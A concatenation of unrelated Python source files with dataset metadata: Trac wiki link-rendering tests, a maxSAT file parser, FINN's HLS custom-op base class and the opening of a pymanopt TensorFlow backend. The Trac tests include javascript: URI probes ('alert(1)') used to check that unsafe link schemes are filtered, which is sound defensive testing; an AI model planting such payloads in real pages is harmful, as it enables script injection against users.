<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">MissingPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/MissingPage" rel="nofollow">FirstLevel/MissingPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/MissingPage" rel="nofollow">FirstLevel/MissingPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">SecondLevel/MissingPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">SecondLevel/MissingPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingFirstLevel/MissingPage" rel="nofollow">MissingFirstLevel/MissingPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingFirstLevel/MissingPage" rel="nofollow">MissingFirstLevel/MissingPage</a>
<a class="missing wiki" href="/wiki/OtherThirdLevel" rel="nofollow">OtherThirdLevel</a>
<a class="missing wiki" href="/wiki/OtherThirdLevel" rel="nofollow">OtherThirdLevel</a>
<a class="missing wiki" href="/wiki/OtherThirdLevel" rel="nofollow">/OtherThirdLevel</a>
</p>
------------------------------
""" # "
SAFE_INTERWIKI_TESTS = u"""
============================== InterWiki with safe_schemes
This is the original MeatBall:InterMapTxt wiki page.
Checkout the [tsvn:http://svn.edgewall.com/repos/trac Trac Repository].
complex link complex:a:test with positional arguments.
js:"alert(1)" javasc:"ript:alert(1)"
------------------------------
<p>
This is the original <a class="ext-link" href="http://www.usemod.com/cgi-bin/mb.pl?InterMapTxt" title="InterMapTxt in MeatBall..."><span class="icon"></span>MeatBall:InterMapTxt</a> wiki page.
</p>
<p>
Checkout the <a class="ext-link" href="tsvn:http://svn.edgewall.com/repos/trac" title="http://svn.edgewall.com/repos/trac in tsvn"><span class="icon"></span>Trac Repository</a>.
</p>
<p>
complex link <a class="ext-link" href="http://server/a/page/test?format=txt" title="resource test in a"><span class="icon"></span>complex:a:test</a> with positional arguments.
</p>
<p>
js:"alert(1)" javasc:"ript:alert(1)"
</p>
------------------------------
""" # "
def wiki_setup(tc):
tc.env.config.set('wiki', 'render_unsafe_content', True) # for #9712
now = datetime_now(utc)
wiki0 = WikiPage(tc.env)
wiki0.name = 'Main/Sub'
wiki0.text = '--'
wiki0.save('joe', 'subpage', now)
wiki1 = WikiPage(tc.env)
wiki1.name = 'TestPage'
wiki1.text = '--'
wiki1.save('joe', 'normal WikiPageNames', now)
wiki2 = WikiPage(tc.env)
wiki2.name = 'Space 1 23'
wiki2.text = '--'
wiki2.save('joe', 'not a WikiPageNames', now)
wiki3 = WikiPage(tc.env)
wiki3.name = u"C'est l'\xe9t\xe9"
wiki3.text = '--'
wiki3.save('joe', 'unicode WikiPageNames', now)
imt = WikiPage(tc.env)
imt.name = u"InterMapTxt"
imt.text = """
This is the InterMapTxt
----
{{{
MeatBall http://www.usemod.com/cgi-bin/mb.pl? # $1 in MeatBall...
tsvn tsvn:
complex http://server/$1/page/$2?format=txt # resource $2 in $1
over http://unused/? # Overridden in trac.ini
js javascript:
javasc javasc
}}}
----
{{{
nolink http://noweb
}}}
"""
imt.save('joe', 'test InterWiki links', now)
tc.env.config.set('interwiki', 'inter',
'http://inter/$1/page/$2 Resource $2 in $1')
tc.env.config.set('interwiki', 'over',
'http://over/$1/page/$2')
w = WikiPage(tc.env)
w.name = 'FirstLevel'
w.text = '--'
w.save('joe', 'first level of hierarchy', now)
w = WikiPage(tc.env)
w.name = 'FirstLevel/SecondLevel'
w.text = '--'
w.save('joe', 'second level of hierarchy', now)
w = WikiPage(tc.env)
w.name = 'FirstLevel/SecondLevel/ThirdLevel'
w.text = '--'
w.save('joe', 'third level of hierarchy', now)
w = WikiPage(tc.env)
w.name = 'FirstLevel/SecondLevel/OtherThirdLevel'
w.text = '--'
w.save('joe', 'other third level of hierarchy', now)
tc.env.db_transaction("INSERT INTO ticket (id) VALUES ('123')")
def wiki_teardown(tc):
tc.env.reset_db()
def wiki_setup_split(tc):
tc.env.config.set('wiki', 'split_page_names', 'true')
wiki_setup(tc)
def wiki_setup_safe_interwiki(tc):
wiki_setup(tc)
tc.env.config.set('wiki', 'render_unsafe_content', 'false')
tc.env.config.set('wiki', 'safe_schemes',
'file,ftp,git,irc,http,https,ssh,svn,tsvn')
def test_suite():
suite = unittest.TestSuite()
suite.addTest(formatter.test_suite(TEST_CASES, wiki_setup, __file__,
wiki_teardown))
suite.addTest(formatter.test_suite(RELATIVE_LINKS_TESTS, wiki_setup,
__file__,
wiki_teardown,
context=('wiki', 'Main/Sub')))
suite.addTest(formatter.test_suite(SPLIT_PAGE_NAMES_TESTS,
wiki_setup_split,
__file__, wiki_teardown,
context=('wiki', 'Main/Sub')))
suite.addTest(formatter.test_suite(SCOPED_LINKS_TESTS, wiki_setup,
__file__, wiki_teardown,
context=('wiki', 'FirstLevel/Second'
'Level/ThirdLevel')))
suite.addTest(formatter.test_suite(SAFE_INTERWIKI_TESTS,
wiki_setup_safe_interwiki, __file__,
wiki_teardown))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
| 45.35206 | 347 | 0.633936 |
734529ea0b7a3abd2db8e2192f628ba6a86ecfb1
| 6,858 |
py
|
Python
|
examples/qaoa/parse_raw_sat.py
|
sourcery-ai-bot/professional-services
|
0dd87e18560894bc68c05b580c6c9f2322eabc47
|
[
"Apache-2.0"
] | null | null | null |
examples/qaoa/parse_raw_sat.py
|
sourcery-ai-bot/professional-services
|
0dd87e18560894bc68c05b580c6c9f2322eabc47
|
[
"Apache-2.0"
] | null | null | null |
examples/qaoa/parse_raw_sat.py
|
sourcery-ai-bot/professional-services
|
0dd87e18560894bc68c05b580c6c9f2322eabc47
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module to parse maxSAT problems from files."""
import argparse
from collections import namedtuple
import os
import re
import numpy as np
from qubo import QuboProblem
# constrains are in form like 'R4:-X3+X6-X0+X5>=-1'
_CONSTRAINT_RE = re.compile(r'R[0-9]+:(-?(?:X[0-9]+[+-])*X[0-9]+)>=(-?[0-9]+)')
_VARIABLE_RE = re.compile(r'[+-]?X[0-9]+')
class Sat(namedtuple('_Sat', ['clauses', 'num_vars', 'source_filename'])):
"""A named tuple that represents a max-SAT problem.
Attributes:
clauses: list of Clauses
num_vars: amount of variables
source_filame: the path to the source file (Daimler's format)
"""
def _check_clause(self, clause, solution):
for el in clause:
s = solution[abs(el) - 1]
if el > 0 and s == 1:
return True
if el < 0 and s == 0:
return True
return False
def check(self, solution):
"""Check a given solution for this SAT problem.
Returns:
Amount of correc clauses.
"""
return sum(self._check_clause(x, solution) for x in self.clauses)
class Clause(list):
"""A list that represents one clause in CNF form.
A Clause consits of nonzero ints, every int represents a variable.
Negative ints represent negation.
A variable can't be both in a positive and negative form in one clause.
"""
def __init__(self, *args, **kwargs):
super(Clause, self).__init__(*args, **kwargs)
self._check()
def _check(self):
abs_vars = [abs(el) for el in self]
if len(set(abs_vars)) != len(self):
raise ValueError('No duplicates in vars are allowed!')
if 0 in self:
raise ValueError('Variable with 0 index is not allowed!')
def append(self, *args, **kwargs):
super(Clause, self).append(*args, **kwargs)
self._check()
def _parse_clause(line):
"""Parse a string that represents a clause.
Args:
line: a string, e.g. 'X0+X1-X2>=-1'
Returns:
A list of non-zero ints representing variables in the clause
(e.g., [1, 2, -3])
"""
line = line.replace(' ', '')
match = re.match(_CONSTRAINT_RE, line)
if not match:
raise ValueError('The input line doesn\'t match the expected format')
raw, c = match.groups()
raw = re.findall(_VARIABLE_RE, raw)
vs = [int(x.replace('X', '')) for x in raw]
# to avoid 0 index (0->1, 1->2, -2->-3)
vs = [x + 1 if x >= 0 else x - 1 for x in vs]
if '-X0' in raw:
vs.remove(1)
vs.append(-1)
if int(c) != 1 - len([x for x in vs if x < 0]):
raise ValueError('')
return vs
def _parse_lines_iterator(lines):
"""Parses a Daimler proprietary format.
Args:
lines: iterator of lines
Returns:
clauses - a list of Clauses of CNF problem
num_vars - amount of variables in a CNF problem
"""
clauses = []
if next(lines).strip() != 'Minimize':
raise ValueError('Wrong file format')
if next(lines).strip() != '0':
raise ValueError('Wrong file format')
if next(lines).strip() != 'Subject To':
raise ValueError('Wrong file format')
while True:
line = next(lines).strip()
if line == 'Bounds':
break
p = _parse_clause(line)
clauses.append(Clause(p))
if next(lines).strip() != 'Binaries':
raise ValueError('Wrong file format')
num_vars = len(next(lines).strip().split())
max_ind = max(max(abs(ind) for ind in c) for c in clauses)
if not num_vars >= max_ind:
raise ValueError('Wrong file format')
if next(lines).strip() != 'End':
raise ValueError('Wrong file format')
return clauses, num_vars
def parse_file(file_name):
"""Parse a proprietary Daimler's format.
Args:
file_name: a full path to a file
Returns:
a SAT instance of a problem
"""
with open(file_name, 'r') as f:
c, n = _parse_lines_iterator(f)
return Sat(c, n, file_name)
def _parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--dir',
help='Dir to process all files',
type=str)
parser.add_argument(
'--dwave',
help='Dir to process all files',
default=False,
type=bool)
args = parser.parse_args()
return vars(args)
def _proccess_all(path, transform=False):
"""Proccess all files and converts problems to QUBO."""
files = [os.path.join(path, f) for f in os.listdir(path)
if f.endswith('.lp')]
problems = []
def _check_stat(file_stat, value, file_name):
if ((file_stat['eq'] == 'gt' and value > file_stat['value']) or
(file_stat['eq'] == 'lt' and value < file_stat['value'])):
file_stat['value'] = value
file_stat['filename'] = file_name
stats = {
'max_totat_bits': {'value': 0, 'filename': '', 'eq': 'gt'},
'max_initial_bits': {'value': 0, 'filename': '', 'eq': 'gt'},
'max_anc_bits': {'value': 0, 'filename': '', 'eq': 'gt'},
'min_total_bits': {'value': np.inf, 'filename': '', 'eq': 'lt'}}
for f in files:
sat = parse_file(f)
qubo = QuboProblem(sat)
initial_bits = sat.num_vars
total_bits = len(qubo.var_names)
if transform:
outputname = '{0}/dwave/{1}.qubo'.format(
os.path.dirname(os.path.realpath(f)),
os.path.basename(f).split('.')[0])
with open(outputname, 'w') as f1:
for line in qubo.to_qwave_format():
f1.write(line)
anc_bits = total_bits - initial_bits
_check_stat(stats['max_initial_bits'], initial_bits, f)
_check_stat(stats['max_totat_bits'], total_bits, f)
_check_stat(stats['min_total_bits'], total_bits, f)
_check_stat(stats['max_anc_bits'], anc_bits, f)
problems.append(sat)
for k, v in stats.items():
print('%s: %s in %s' % (k, v['value'], v['filename']))
print('Success!')
def main():
args = _parse_args()
if 'dir' in args:
_proccess_all(args['dir'], args['dwave'])
if __name__ == '__main__':
main()
| 31.315068 | 79 | 0.595071 |
a688898f4a43b33fd3f07cda12144b84829e451f
| 23,545 |
py
|
Python
|
src/finn/custom_op/fpgadataflow/__init__.py
|
vision-agh/finn_fork_pp_lidar
|
a40bd59d3f42a246b0d06329208b84bcc7be8a3e
|
[
"BSD-3-Clause"
] | 1 |
2021-01-29T14:39:48.000Z
|
2021-01-29T14:39:48.000Z
|
src/finn/custom_op/fpgadataflow/__init__.py
|
vision-agh/finn_fork_pp_lidar
|
a40bd59d3f42a246b0d06329208b84bcc7be8a3e
|
[
"BSD-3-Clause"
] | null | null | null |
src/finn/custom_op/fpgadataflow/__init__.py
|
vision-agh/finn_fork_pp_lidar
|
a40bd59d3f42a246b0d06329208b84bcc7be8a3e
|
[
"BSD-3-Clause"
] | 1 |
2022-03-07T02:57:55.000Z
|
2022-03-07T02:57:55.000Z
|
# Copyright (c) 2020, Xilinx
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of FINN nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from abc import abstractmethod
import numpy as np
import os
import subprocess
from finn.custom_op import CustomOp
from finn.util.basic import (
CppBuilder,
make_build_dir,
roundup_to_integer_multiple,
get_rtlsim_trace_depth,
)
from finn.util.fpgadataflow import (
IPGenBuilder,
pyverilate_get_liveness_threshold_cycles,
rtlsim_multi_io,
)
from . import templates
try:
from pyverilator import PyVerilator
except ModuleNotFoundError:
PyVerilator = None
class HLSCustomOp(CustomOp):
"""HLSCustomOp class all custom ops that correspond to a finn-hlslib
function are based on. Contains different functions every fpgadataflow
custom node should have. Some as abstract methods, these have to be filled
when writing a new fpgadataflow custom op node."""
def __init__(self, onnx_node):
super().__init__(onnx_node)
self.code_gen_dict = {}
# getting templates from templates.py
# template for single node execution
self.docompute_template = templates.docompute_template
# templates for single node ip generation
# cpp file
self.ipgen_template = templates.ipgen_template
# tcl script
self.ipgentcl_template = templates.ipgentcl_template
def get_nodeattr_types(self):
return {
"backend": ("s", True, "fpgadataflow"),
"code_gen_dir_cppsim": ("s", False, ""),
"code_gen_dir_ipgen": ("s", False, ""),
"executable_path": ("s", False, ""),
"ipgen_path": ("s", False, ""),
"ip_path": ("s", False, ""),
"ip_vlnv": ("s", False, ""),
"exec_mode": ("s", False, ""),
"sim_cycles": ("i", False, 0),
"rtlsim_trace": ("s", False, ""),
"res_estimate": ("s", False, ""),
"res_hls": ("s", False, ""),
"res_synth": ("s", False, ""),
"rtlsim_so": ("s", False, ""),
# input and output FIFO depths
"inFIFODepth": ("i", False, 2),
"outFIFODepth": ("i", False, 2),
}
def get_verilog_top_module_name(self):
"Return the Verilog top module name for this node."
node = self.onnx_node
prefixed_top_name = "%s_%s" % (node.name, node.name)
return prefixed_top_name
def get_verilog_top_filename(self):
"Return the Verilog top module filename for this node."
verilog_file = "{}/project_{}/sol1/impl/verilog/{}.v".format(
self.get_nodeattr("code_gen_dir_ipgen"),
self.onnx_node.name,
self.get_verilog_top_module_name(),
)
return verilog_file
def get_all_verilog_paths(self):
"Return list of all folders containing Verilog code for this node."
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
assert (
code_gen_dir != ""
), """Node attribute "code_gen_dir_ipgen" is
not set. Please run HLSSynthIP first."""
verilog_path = "{}/project_{}/sol1/impl/verilog/".format(
code_gen_dir, self.onnx_node.name
)
# default impl only returns the HLS verilog codegen dir
return [verilog_path]
def get_all_verilog_filenames(self):
"Return list of all Verilog files used for this node."
verilog_files = []
verilog_paths = self.get_all_verilog_paths()
for verilog_path in verilog_paths:
for f in os.listdir(verilog_path):
if f.endswith(".v"):
verilog_files += [f]
return verilog_files
def prepare_rtlsim(self):
"""Creates a Verilator emulation library for the RTL code generated
for this node, sets the rtlsim_so attribute to its path and returns
a PyVerilator wrapper around it."""
if PyVerilator is None:
raise ImportError("Installation of PyVerilator is required.")
verilog_paths = self.get_all_verilog_paths()
verilog_files = self.get_all_verilog_filenames()
# build the Verilator emu library
sim = PyVerilator.build(
verilog_files,
build_dir=make_build_dir("pyverilator_" + self.onnx_node.name + "_"),
verilog_path=verilog_paths,
trace_depth=get_rtlsim_trace_depth(),
top_module_name=self.get_verilog_top_module_name(),
)
# save generated lib filename in attribute
self.set_nodeattr("rtlsim_so", sim.lib._name)
return sim
def get_rtlsim(self):
"""Return a PyVerilator wrapper for the Verilator emulation library
for this node."""
rtlsim_so = self.get_nodeattr("rtlsim_so")
assert os.path.isfile(rtlsim_so), "Cannot find rtlsim library."
# create PyVerilator wrapper
sim = PyVerilator(rtlsim_so)
return sim
def node_res_estimation(self):
"""Returns summarized resource estimation of BRAMs and LUTs
of the node as a dictionary."""
ret = dict()
ret["BRAM_18K"] = self.bram_estimation()
ret["LUT"] = self.lut_estimation()
return ret
def bram_estimation(self):
"""Function for BRAM resource estimation, is member function of
HLSCustomOp class but has to be filled by every node"""
return 0
def lut_estimation(self):
"""Function for LUT resource estimation, is member function of
HLSCustomOp class but has to be filled by every node"""
return 0
def code_generation_ipgen(self, model, fpgapart, clk):
"""Generates c++ code and tcl script for ip generation."""
node = self.onnx_node
# generate top cpp file for ip generation
path = self.get_nodeattr("code_gen_dir_ipgen")
self.code_gen_dict["$AP_INT_MAX_W$"] = [str(self.get_ap_int_max_w())]
self.generate_params(model, path)
self.global_includes()
self.defines("ipgen")
self.blackboxfunction()
self.pragmas()
self.docompute()
template = self.ipgen_template
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
f = open(os.path.join(code_gen_dir, "top_{}.cpp".format(node.name)), "w")
f.write(template)
f.close()
self.code_gen_dict.clear()
# generate tcl script for ip generation
self.code_gen_dict["$PROJECTNAME$"] = ["project_{}".format(node.name)]
self.code_gen_dict["$HWSRCDIR$"] = [code_gen_dir]
self.code_gen_dict["$FPGAPART$"] = [fpgapart]
self.code_gen_dict["$FINNHLSLIBDIR$"] = ["/workspace/finn-hlslib"]
self.code_gen_dict["$TOPFXN$"] = [node.name]
self.code_gen_dict["$CLKPERIOD$"] = [str(clk)]
self.code_gen_dict["$EXTRA_DIRECTIVES$"] = self.ipgen_extra_directives()
template = self.ipgentcl_template
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
f = open(os.path.join(code_gen_dir, "hls_syn_{}.tcl".format(node.name)), "w")
f.write(template)
f.close()
self.code_gen_dict.clear()
def ipgen_extra_directives(self):
"Return a list of extra tcl directives for HLS synthesis."
return []
def ipgen_singlenode_code(self):
"""Builds the bash script for ip generation using the IPGenBuilder from
finn.util.fpgadataflow."""
node = self.onnx_node
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
builder = IPGenBuilder()
builder.append_tcl(code_gen_dir + "/hls_syn_{}.tcl".format(node.name))
builder.set_ipgen_path(code_gen_dir + "/project_{}".format(node.name))
builder.build(code_gen_dir)
self.set_nodeattr("ipgen_path", builder.ipgen_path)
self.set_nodeattr("ip_path", builder.ipgen_path + "/sol1/impl/ip")
vlnv = "xilinx.com:hls:%s:1.0" % node.name
self.set_nodeattr("ip_vlnv", vlnv)
def code_generation_cppsim(self, model):
"""Generates c++ code for simulation (cppsim)."""
node = self.onnx_node
path = self.get_nodeattr("code_gen_dir_cppsim")
self.code_gen_dict["$AP_INT_MAX_W$"] = [str(self.get_ap_int_max_w())]
self.generate_params(model, path)
self.global_includes()
self.defines("cppsim")
self.read_npy_data()
self.strm_decl()
self.pragmas()
self.docompute()
self.dataoutstrm()
self.save_as_npy()
template = self.docompute_template
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
code_gen_dir = self.get_nodeattr("code_gen_dir_cppsim")
f = open(os.path.join(code_gen_dir, "execute_{}.cpp".format(node.op_type)), "w")
f.write(template)
f.close()
self.code_gen_dict.clear()
def compile_singlenode_code(self):
"""Builds the bash script for compilation using the CppBuilder from
finn.util.basic and executes the script to produce the executable."""
code_gen_dir = self.get_nodeattr("code_gen_dir_cppsim")
builder = CppBuilder()
# to enable additional debug features please uncommand the next line
# builder.append_includes("-DDEBUG")
builder.append_includes("-I/workspace/finn/src/finn/data/cpp")
builder.append_includes("-I/workspace/cnpy/")
builder.append_includes("-I/workspace/finn-hlslib")
builder.append_includes("-I{}/include".format(os.environ["VIVADO_PATH"]))
builder.append_includes("--std=c++11")
builder.append_includes("-O3")
builder.append_sources(code_gen_dir + "/*.cpp")
builder.append_sources("/workspace/cnpy/cnpy.cpp")
builder.append_includes("-lz")
builder.set_executable_path(code_gen_dir + "/node_model")
builder.build(code_gen_dir)
self.set_nodeattr("executable_path", builder.executable_path)
def dynamic_input_to_npy(self, context, count):
"""Saves input (given context) into .npy files.
Count indicates the number of inputs that have to be saved."""
node = self.onnx_node
code_gen_dir = self.get_nodeattr("code_gen_dir_cppsim")
if code_gen_dir == "":
raise Exception(
"""
Found no codegen dir for this node, did you run the prepare_cppsim transformation?
"""
)
# create a npy file for each input of the node (in_ind is input index)
# assuming dynamic inputs start from 0
for in_ind in range(count):
current_input_name = node.input[in_ind]
# make copy before saving array
input_array = context[current_input_name].copy()
np.save(
os.path.join(code_gen_dir, "input_{}.npy".format(in_ind)), input_array
)
def npy_to_dynamic_output(self, context):
"""Reads the output from an output.npy file generated from cppsim and
places its content into the context dictionary."""
node = self.onnx_node
code_gen_dir = self.get_nodeattr("code_gen_dir_cppsim")
output = np.load("{}/output.npy".format(code_gen_dir))
context[node.output[0]] = output
def npy_to_dynamic_outputs(self, context, npy_list):
"""Reads the output from .npy files generated from cppsim and places
their content into the context dictionary.
npy_list is a list specifying which files to read, and its order must
match the order of node outputs."""
node = self.onnx_node
code_gen_dir = self.get_nodeattr("code_gen_dir_cppsim")
for i in range(len(npy_list)):
output = np.load("{}/{}".format(code_gen_dir, npy_list[i]))
context[node.output[i]] = output
def exec_precompiled_singlenode_model(self):
"""Executes precompiled executable."""
executable_path = self.get_nodeattr("executable_path")
if executable_path == "":
raise Exception(
"""
Found no executable for this node, did you run the codegen and
compilation transformations?
"""
)
process_execute = subprocess.Popen(executable_path, stdout=subprocess.PIPE)
process_execute.communicate()
def reset_rtlsim(self, sim):
"""Sets reset input in pyverilator to zero, toggles the clock and set it
back to one"""
sim.io.ap_rst_n = 0
sim.io.ap_clk = 1
sim.io.ap_clk = 0
sim.io.ap_rst_n = 1
def toggle_clk(self, sim):
"""Toggles the clock input in pyverilator once."""
sim.io.ap_clk = 1
sim.io.ap_clk = 0
def rtlsim(self, sim, inp, inp2=None):
"""Runs the pyverilator simulation by passing the input values to the simulation,
toggle the clock and observing the execution time. Function contains also an
observation loop that can abort the simulation if no output value is produced
after 100 cycles."""
trace_file = self.get_nodeattr("rtlsim_trace")
if trace_file != "":
if trace_file == "default":
trace_file = self.onnx_node.name + ".vcd"
sim.start_vcd_trace(trace_file)
inputs = inp
outputs = []
sim.io.out_V_V_TREADY = 1
# observe if output is completely calculated
# observation_count will contain the number of cycles the calculation ran
num_out_values = self.get_number_output_values()
output_observed = False
observation_count = 0
# avoid infinite looping of simulation by aborting when there is no change in
# output values after 100 cycles
no_change_count = 0
old_outputs = outputs
liveness_threshold = pyverilate_get_liveness_threshold_cycles()
while not (output_observed):
sim.io.in0_V_V_TVALID = 1 if len(inputs) > 0 else 0
sim.io.in0_V_V_TDATA = inputs[0] if len(inputs) > 0 else 0
if sim.io.in0_V_V_TREADY == 1 and sim.io.in0_V_V_TVALID == 1:
inputs = inputs[1:]
if inp2 is not None:
sim.io.in1_V_V_TVALID = 1 if len(inp2) > 0 else 0
sim.io.in1_V_V_TDATA = inp2[0] if len(inp2) > 0 else 0
if sim.io.in1_V_V_TREADY == 1 and sim.io.in1_V_V_TVALID == 1:
inp2 = inp2[1:]
if sim.io.out_V_V_TVALID == 1 and sim.io.out_V_V_TREADY == 1:
outputs = outputs + [sim.io.out_V_V_TDATA]
sim.io.ap_clk = 1
sim.io.ap_clk = 0
observation_count = observation_count + 1
no_change_count = no_change_count + 1
if len(outputs) == num_out_values:
self.set_nodeattr("sim_cycles", observation_count)
output_observed = True
if no_change_count == liveness_threshold:
if old_outputs == outputs:
if trace_file != "":
sim.flush_vcd_trace()
sim.stop_vcd_trace()
raise Exception(
"Error in simulation! Takes too long to produce output. "
"Consider setting the LIVENESS_THRESHOLD env.var. to a "
"larger value."
)
else:
no_change_count = 0
old_outputs = outputs
if trace_file != "":
sim.flush_vcd_trace()
sim.stop_vcd_trace()
return outputs
def rtlsim_multi_io(self, sim, io_dict):
"Run rtlsim for this node, supports multiple i/o streams."
trace_file = self.get_nodeattr("rtlsim_trace")
if trace_file == "default":
trace_file = self.onnx_node.name + ".vcd"
num_out_values = self.get_number_output_values()
total_cycle_count = rtlsim_multi_io(sim, io_dict, num_out_values, trace_file)
self.set_nodeattr("sim_cycles", total_cycle_count)
def execute_node(self, context, graph):
"""Executes single node using cppsim or rtlsim."""
mode = self.get_nodeattr("exec_mode")
if mode == "cppsim":
# save input(s)
self.dynamic_input_to_npy(context, 1)
# execute the precompiled model
self.exec_precompiled_singlenode_model()
# load output npy file
self.npy_to_dynamic_output(context)
elif mode == "rtlsim":
pass
else:
raise Exception(
"""Invalid value for attribute exec_mode! Is currently set to: {}
has to be set to one of the following value ("cppsim", "rtlsim")""".format(
mode
)
)
def generate_params(self, model, path):
"""Function to generate parameters (i.e. weights and thresholds),
is member function of HLSCustomOp class but has to be filled
by every node."""
pass
@abstractmethod
def get_number_output_values(self):
"""Function to get the number of expected output values,
is member function of HLSCustomOp class but has to be filled
by every node."""
pass
@abstractmethod
def global_includes(self):
"""Function to set the global includes for c++ code that has to be generated
for cppsim or rtlsim, is member function of HLSCustomOp class but has to
be filled by every node."""
pass
@abstractmethod
def defines(self, var):
"""Function to set the define commands for c++ code that has to be generated
for cppsim or rtlsim, is member function of HLSCustomOp class but has to
be filled by every node.
var: makes it possible to reuse the function for different c++ code generation.
I.e. if set to "ipgen" in StreamingFCLayer_Batch additional PRAGMA defines are
added."""
pass
@abstractmethod
def read_npy_data(self):
"""Function to generate the commands for reading data from .npy file in c++,
is member function of HLSCustomOp class but has to be filled by every node."""
pass
@abstractmethod
def strm_decl(self):
"""Function to generate the commands for the stream declaration in c++,
is member function of HLSCustomOp class but has to be filled
by every node."""
pass
@abstractmethod
def docompute(self):
"""Function to generate the commands for the computational part of the
c++ code, is member function of HLSCustomOp class but has to be filled
by every node."""
pass
@abstractmethod
def dataoutstrm(self):
"""Function to generate the commands for reading out data from c++ and convert
into npy format, is member function of HLSCustomOp class but has to be filled
by every node."""
pass
@abstractmethod
def save_as_npy(self):
"""Function to generate the commands for saving data in .npy file in c++,
is member function of HLSCustomOp class but has to be filled by every node."""
pass
@abstractmethod
def blackboxfunction(self):
"""Function to generate a blackbock function in c++ from which an IP block
will be generated, is member function of HLSCustomOp class but has to be filled
by every node."""
pass
@abstractmethod
def pragmas(self):
"""Function to generate the pragma commands in c++, is member function of
HLSCustomOp class but has to be filled by every node."""
pass
def get_normal_input_shape(self):
"""Returns normal input shape if implemented."""
raise Exception("get_normal_input_shape not implemented for this op")
def get_normal_output_shape(self):
"""Returns folded output shape if implemented."""
raise Exception("get_normal_output_shape not implemented for this op")
def get_folded_input_shape(self):
"""Returns folded input shape (according to synapse folding), if implemented."""
raise Exception("get_folded_input_shape not implemented for this op")
def get_folded_output_shape(self):
"""Returns folded output shape (according to neuron folding), if implemented."""
raise Exception("get_folded_output_shape not implemented for this op")
def get_instream_width(self):
"""Returns input stream width, if implemented."""
raise Exception("get_instream_width not implemented for this op")
def get_outstream_width(self):
"""Returns output stream width, if implemented."""
raise Exception("get_outstream_width not implemented for this op")
def get_instream_width_padded(self):
"""Returns input stream width padded to a multiple of 8. This is required
by the AXI Stream spec."""
in_width = self.get_instream_width()
return roundup_to_integer_multiple(in_width, 8)
def get_outstream_width_padded(self):
"""Returns output stream width padded to a multiple of 8. This is required
by the AXI Stream spec."""
out_width = self.get_outstream_width()
return roundup_to_integer_multiple(out_width, 8)
def get_ap_int_max_w(self):
"Return the maximum width of any ap_int used in this module."
instream = self.get_instream_width()
outstream = self.get_outstream_width()
return max([instream, outstream])
| 40.247863 | 89 | 0.640136 |
5c5cce6d9adaa4bcb55dbe5ec319111ae9b1ef18
| 2,940 |
py
|
Python
|
pymanopt/tools/autodiff/_tensorflow.py
|
Nehoroshiy/pymanopt
|
e0d45b6299c9e5fee21b2780954db6045afb878b
|
[
"BSD-3-Clause"
] | 1 |
2021-11-08T11:30:49.000Z
|
2021-11-08T11:30:49.000Z
|
pymanopt/tools/autodiff/_tensorflow.py
|
thatdeep/pymanopt
|
e0d45b6299c9e5fee21b2780954db6045afb878b
|
[
"BSD-3-Clause"
] | null | null | null |
pymanopt/tools/autodiff/_tensorflow.py
|
thatdeep/pymanopt
|
e0d45b6299c9e5fee21b2780954db6045afb878b
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Module containing functions to differentiate functions using tensorflow.
"""
try:
import tensorflow as tf
from tensorflow.python.ops.gradients import _hessian_vector_product
except ImportError:
tf = None
from warnings import warn
from ._backend import Backend, assert_backend_available
class TensorflowBackend(Backend):
def __init__(self):
if tf is not None:
